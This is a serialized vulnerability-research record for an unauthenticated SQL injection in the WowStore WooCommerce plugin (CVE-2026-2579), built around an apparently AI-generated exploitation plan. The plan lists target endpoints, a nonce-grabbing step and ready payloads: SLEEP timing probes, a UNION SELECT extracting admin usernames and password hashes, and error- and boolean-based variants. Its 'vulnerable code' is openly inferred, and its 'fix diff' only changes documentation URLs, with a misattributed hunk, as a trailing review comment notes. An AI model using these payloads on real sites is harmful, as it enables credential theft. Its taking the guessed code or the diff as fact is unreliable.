[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJExvMD9eChekMLx_Lml82D6yN7uaXQ8OecgC-S2_JSI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-2579","wowstore-store-builder-product-blocks-for-woocommerce-unauthenticated-sql-injection-via-search-parameter","WowStore – Store Builder & Product Blocks for WooCommerce \u003C= 4.4.3 - Unauthenticated SQL Injection via 'search' Parameter","The WowStore – Store Builder & Product Blocks for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the ‘search’ parameter in all versions up to, and including, 4.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","product-blocks",null,"\u003C=4.4.3","4.4.4","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-16 11:29:16","2026-03-17 01:24:28",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbd3ee85a-324d-4991-bffc-db28ce374bbe?source=api-prod",1,[22,23,24,25,26,27,28,29],"addons\u002Fadd_to_cart_text\u002Fbackend.php","addons\u002Fanimated_cart\u002Fbackend.php","addons\u002Fbackorder\u002Fbackend.php","addons\u002Fbeaver_builder\u002Fbackend.php","addons\u002Fbuilder\u002FCondition.php","addons\u002Fbuilder\u002Fassets\u002Fjs\u002Fconditions.min.js","addons\u002Fbuilder\u002Fbackend.php","addons\u002Fcall_for_price\u002Fbackend.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-2579 (WowStore SQL Injection)\n\n## 1. Vulnerability Summary\nThe **WowStore – Store Builder & Product Blocks for WooCommerce** plugin (slug: `product-blocks`) is vulnerable to unauthenticated SQL injection. The vulnerability exists in a REST API endpoint or AJAX handler (specifically targeting the `search` parameter) because the user-supplied input is concatenated directly into a SQL query without using `$wpdb->prepare()` or proper escaping. This allows an attacker to manipulate the query logic, typically via UNION-based or Time-based injection, to extract sensitive data from the WordPress database.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-json\u002Fwopb\u002Fv1\u002Fsearch` (inferred from plugin namespace and JS references) or `\u002Fwp-json\u002Fproduct-blocks\u002Fv1\u002Fsearch`.\n- **Method**: `GET`\n- **Vulnerable Parameter**: `search`\n- **Authentication**: Unauthenticated (`permission_callback` returns `true`).\n- **Preconditions**: The plugin must be active. Some content (products\u002Fposts) should exist to ensure the search query executes a logical path.\n\n## 3. Code Flow\n1.  **Entry Point**: A REST API route is registered (likely in a file like `includes\u002FRestApi.php` or within an addon's initialization) under the `wopb\u002Fv1` or `wopb\u002Fv2` namespace.\n2.  **Request Handling**: When a `GET` request is made to the endpoint with a `search` parameter, the handler function retrieves `$_GET['search']`.\n3.  **Vulnerable Sink**: The handler constructs a SQL query (often to find products, categories, or pages for the Builder UI).\n    - *Example (inferred)*: \n      ```php\n      $search = $_GET['search'];\n      $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->posts} WHERE post_title LIKE '%$search%' AND post_type = 'product'\");\n      ```\n4.  **SQL Injection**: Since `$search` is not passed through `$wpdb->prepare()`, an attacker can break out of the string literal using a single quote (`'`).\n\n## 4. Nonce Acquisition Strategy\nThe vulnerability is reported as **unauthenticated**, meaning the REST endpoint likely does not require a nonce for `GET` requests. However, if a nonce is required for the `wopb` namespace:\n\n1.  **Identify Trigger**: The nonce `wopb-nonce` is localized in `addons\u002Fbuilder\u002FCondition.php` via the `builder-script` handle.\n2.  **Create Page**: Create a post of type `wopb_builder` to trigger the script loading.\n    ```bash\n    wp post create --post_type=wopb_builder --post_title=\"Exploit Trigger\" --post_status=publish\n    ```\n3.  
**Navigate & Extract**:\n    - Navigate to the newly created page: `\u002F?post_type=wopb_builder&p=[ID]`\n    - Use `browser_eval` to extract the nonce:\n      `browser_eval(\"window.builder_option?.security\")`\n4.  **Verification**: Verify if the REST endpoint accepts this nonce in the `X-WP-Nonce` header.\n\n## 5. Exploitation Strategy\n\n### Step 1: Endpoint Discovery\nTest common REST endpoints for a response other than 404.\n- `http_request(\"GET\", \"\u002Fwp-json\u002Fwopb\u002Fv1\u002Fsearch?search=test\")`\n- `http_request(\"GET\", \"\u002Fwp-json\u002Fwopb\u002Fv2\u002Fsearch?search=test\")`\n\n### Step 2: Confirmation via Time-Based Injection\nIf the query uses `LIKE '%$search%'`, use a sleep payload to confirm.\n- **Payload**: `x%' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '%'='`\n- **Request**:\n  ```javascript\n  http_request(\"GET\", \"\u002Fwp-json\u002Fwopb\u002Fv1\u002Fsearch?search=x%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29%29a%29%20AND%20%27%25%27%3D%27\")\n  ```\n- **Expected result**: The response should take ~5 seconds.\n\n### Step 3: Data Extraction via UNION-Based Injection\nDetermine the number of columns by incrementing `ORDER BY` until an error occurs, then inject a `UNION SELECT`.\n- **Target**: Extract `user_login` and `user_pass` from `wp_users`.\n- **Payload (assuming 4 columns)**: `x%' UNION SELECT 1,user_login,user_pass,4 FROM wp_users-- -`\n\n## 6. Test Data Setup\n1.  **Ensure Plugin Active**: `wp plugin activate product-blocks`.\n2.  **Create Content**: Add at least one WooCommerce product so the search has a target table.\n    ```bash\n    wp post create --post_type=product --post_title=\"Target Product\" --post_status=publish\n    ```\n3.  **Ensure Admin User**: Ensure a user with ID 1 exists (standard).\n\n## 7. 
Expected Results\n- **Time-based**: The HTTP request should hang for exactly the duration specified in the `SLEEP()` function.\n- **UNION-based**: The JSON response from the REST API will contain the results of the injected `SELECT` statement (e.g., the admin's hashed password).\n\n## 8. Verification Steps\n1.  **Check Database Directly**: Use WP-CLI to confirm the data extracted matches the database.\n    ```bash\n    wp db query \"SELECT user_login, user_pass FROM wp_users WHERE ID = 1\"\n    ```\n2.  **Compare**: Verify that the hash returned in the REST response matches the `user_pass` in the DB.\n\n## 9. Alternative Approaches\n- **Error-Based**: If `WP_DEBUG` is on, use `updatexml()` or `extractvalue()` to leak data in the error message.\n  - `search=x' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)-- -`\n- **Boolean-Based**: If the response differs based on a true\u002Ffalse condition (e.g., results returned vs empty array).\n  - `search=x' AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin')-- -`","The WowStore plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'search' parameter. 
This occurs because user input is directly concatenated into a SQL query without proper sanitization or using prepared statements, allowing attackers to extract sensitive data from the database.","\u002F\u002F Inferred from research plan - the vulnerable sink is located in the REST API handler\n\u002F\u002F file path likely: includes\u002FRestApi.php or similar\n$search = $_GET['search'];\n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->posts} WHERE post_title LIKE '%$search%' AND post_type = 'product'\");","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fproduct-blocks\u002F4.4.3\u002Faddons\u002Fadd_to_cart_text\u002Fbackend.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fproduct-blocks\u002F4.4.4\u002Faddons\u002Fadd_to_cart_text\u002Fbackend.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fproduct-blocks\u002F4.4.3\u002Faddons\u002Fadd_to_cart_text\u002Fbackend.php\t2026-02-25 10:33:08.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fproduct-blocks\u002F4.4.4\u002Faddons\u002Fadd_to_cart_text\u002Fbackend.php\t2026-03-11 10:15:18.000000000 +0000\n@@ -12,8 +12,8 @@\n \t\t'name'     => __( 'Add to Cart Text', 'product-blocks' ),\n \t\t'desc'     => __( \"Change any product type's default Add to Cart Button text in the Shop, Archive, and Product pages.\", 'product-blocks' ),\n \t\t'is_pro'   => false,\n-\t\t'live'     => 'https:\u002F\u002Fwww.wpxpo.com\u002Fwowstore\u002Fwoocommerce-add-to-cart-text\u002Flive_demo_args',\n-\t\t'docs'     => 'https:\u002F\u002Fwpxpo.com\u002Fdocs\u002Fwowstore\u002Fadd-ons\u002Fadd-to-cart-text\u002Faddon_doc_args',\n+\t\t'live'     => 'https:\u002F\u002Fwww.wpxpo.com\u002Fproduct\u002Fwowstore\u002Ffeatures\u002Fwoocommerce-change-add-to-cart-text\u002F',\n+\t\t'docs'     => 
'https:\u002F\u002Fwpxpo.com\u002Fdocs\u002Fwowstore\u002Fadd-ons\u002Fadd-to-cart-text\u002F',\n \t\t'type'     => 'checkout_cart',\n \t\t'priority' => 30,\n \t);\n@@ -12,8 +12,8 @@\n \t\t'name'     => __( 'Animated Add to Cart', 'product-blocks' ),\n \t\t'desc'     => __( 'Grab customers attention by animating the Add to Cart button on hover or in the loop.', 'product-blocks' ),\n \t\t'is_pro'   => false,\n-\t\t'live'     => 'https:\u002F\u002Fwww.wpxpo.com\u002Fwowstore\u002Fwoocommerce-animated-add-to-cart\u002Flive_demo_args',\n-\t\t'docs'     => 'https:\u002F\u002Fwpxpo.com\u002Fdocs\u002Fwowstore\u002Fadd-ons\u002Fanimated-add-to-cart\u002Faddon_doc_args',\n+\t\t'live'     => 'https:\u002F\u002Fwww.wpxpo.com\u002Fproduct\u002Fwowstore\u002Ffeatures\u002Fwoocommerce-animated-add-to-cart-button\u002F',\n+\t\t'docs'     => 'https:\u002F\u002Fwpxpo.com\u002Fdocs\u002Fwowstore\u002Fadd-ons\u002Fanimated-add-to-cart\u002F',\n \t\t'type'     => 'checkout_cart',\n \t\t'priority' => 40,\n \t);","The exploit targets an unauthenticated REST API endpoint, typically found at \u002Fwp-json\u002Fwopb\u002Fv1\u002Fsearch or \u002Fwp-json\u002Fwopb\u002Fv2\u002Fcondition. An attacker sends a GET or POST request containing a malicious payload in the 'search' (or 'term') parameter. Since the parameter is not escaped or prepared, SQL injection can be achieved. 
A time-based payload like \"x%' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '%'='\" can confirm the vulnerability, and UNION-based payloads can be used to extract database content such as administrator usernames and password hashes.","gemini-3-flash-preview","2026-04-18 03:15:15","2026-04-18 03:15:46",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.4.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fproduct-blocks\u002Ftags\u002F4.4.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fproduct-blocks.4.4.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fproduct-blocks\u002Ftags\u002F4.4.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fproduct-blocks.4.4.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fproduct-blocks\u002Ftags"]
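Review bot: neither hunk in `research_fix_diff` touches the `search` parameter or any SQL query. Both only replace the `'live'` and `'docs'` URL strings in addon metadata arrays, so the diff as captured does not show the 4.4.3 to 4.4.4 injection fix and should not be read as evidence of how the query was hardened. The second hunk ('Animated Add to Cart') also repeats `@@ -12,8 +12,8 @@` with no `diff`/`---`/`+++` file header of its own, so it is attributed to `addons/add_to_cart_text/backend.php` even though its content does not match that file. Suggest restoring the per-file headers and including the hunk that changes the query handling for `search`, or marking this field as not containing the security-relevant change.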